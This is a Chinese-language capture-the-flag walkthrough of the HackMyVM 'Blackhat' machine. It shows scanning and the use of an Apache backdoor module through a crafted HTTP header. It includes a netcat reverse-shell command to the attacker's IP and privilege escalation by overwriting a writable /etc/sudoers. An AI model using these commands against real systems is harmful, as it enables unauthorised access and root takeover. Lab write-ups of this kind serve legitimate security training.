HMV Blackhat

信息收集

IP=192.168.0.205
nmap $IP -p-

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 21:10 EDT
Nmap scan report for 192.168.0.205
Host is up (0.00024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:6C:E1:C7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.83 seconds

只有一个 80 端口。打开看看网页。
顺手扫一下目录。

gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -x php,txt,html,7z,zip,pdf

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.205
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              7z,zip,pdf,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1437]
/server-status        (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/phpinfo.php          (Status: 200) [Size: 69329]
/index.html           (Status: 200) [Size: 1437]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
Progress: 393148 / 393155 (100.00%)
===============================================================
Finished
===============================================================

有一个 phpinfo.php，打开看看，就是 PHP 7.4.30 的 phpinfo 信息。 首页这意思是这个网站是被 Hacked 过的。
查看首页源代码，有一段 js 代码。

document.onkeydown = function (e) {
  if (
    e.ctrlKey &&
    (e.keyCode === 67 ||
      e.keyCode === 86 ||
      e.keyCode === 85 ||
      e.keyCode === 117)
  ) {
    return false;
  } else {
    return true;
  }
};
$(document).keypress("u", function (e) {
  if (e.ctrlKey) {
    return false;
  } else {
    return true;
  }
});

查了下 keyCode 的值，67 是 C，86 是 V，85 是 U，117 是 u。
那应该就是禁止复制粘贴？

多想了。。

暂时没有其他信息，卡了一会，瞅了一眼 ll104567 的 WP。才知道再 phpinfo 里有一个 mod_backdoor的模块。去查了下。 在 github 上找到了两个可能的源码

• https://github.com/VladRico/apache2_BackdoorMod。
• https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor

看了说明，按照操作，应该是第二个。只需要在 Header 中增加 Header: Backdoor:cmd 就可以执行命令。

curl -H 'Backdoor:id' http://$IP/

└─# curl -H 'Backdoor:id' http://$IP/
uid=33(www-data) gid=33(www-data) groups=33(www-data)

果然。来反弹。

curl -H 'Backdoor:nc -e /bin/bash 192.168.0.30 1234' http://$IP/

成功拿到：

(remote) www-data@blackhat:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

(remote) www-data@blackhat:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
darkdante:x:1000:1000:,,,:/home/darkdante:/bin/bash

(remote) www-data@blackhat:/home$ cd darkdante/
(remote) www-data@blackhat:/home/darkdante$ ls
user.txt
(remote) www-data@blackhat:/home/darkdante$ ls -al
total 28
drwxr-xr-x 3 darkdante darkdante 4096 Nov 13  2022 .
drwxr-xr-x 3 root      root      4096 Nov 11  2022 ..
lrwxrwxrwx 1 root      root         9 Nov 11  2022 .bash_history -> /dev/null
-rw-r--r-- 1 darkdante darkdante  220 Nov 11  2022 .bash_logout
-rw-r--r-- 1 darkdante darkdante 3526 Nov 11  2022 .bashrc
drwxr-xr-x 3 darkdante darkdante 4096 Nov 11  2022 .local
-rw-r--r-- 1 darkdante darkdante  807 Nov 11  2022 .profile
-rwx------ 1 darkdante darkdante   33 Nov 11  2022 user.txt
(remote) www-data@blackhat:/home/darkdante$ cat user.txt
cat: user.txt: Permission denied

提权 darkdante

没有 sudo，看看 pspy64 ,也没有什么进程。

再拿来 linpeas 看看。

看到了一个似乎有用的：

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
# file: /etc/sudoers
USER   root       r--
user   darkdante  rw-
GROUP  root       r--
mask              rw-
other             ---

darkdante 竟然可以写 /etc/sudoers。那就拿到 darkdante 就等于拿到 root 了。
只可惜，我没有拿到 user。

因为这货没看见.ssh ,而且翻了很久没找到 darkdante 的密码。

只能再去偷看一下别人的 WP 了。

看完回来，只能说。。。。

这货 darkdante 的密码应该是空的。。

su darkdante
(remote) www-data@blackhat:/tmp$ su darkdante
darkdante@blackhat:/tmp$

提权 root

我们刚才已经知道这货可以写 /etc/sudoers，那就直接写一个。

echo "darkdante ALL=(ALL) NOPASSWD: ALL #" > /etc/sudoers
darkdante@blackhat:/tmp$ sudo su
root@blackhat:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

轻松拿到 root。撒花。🎉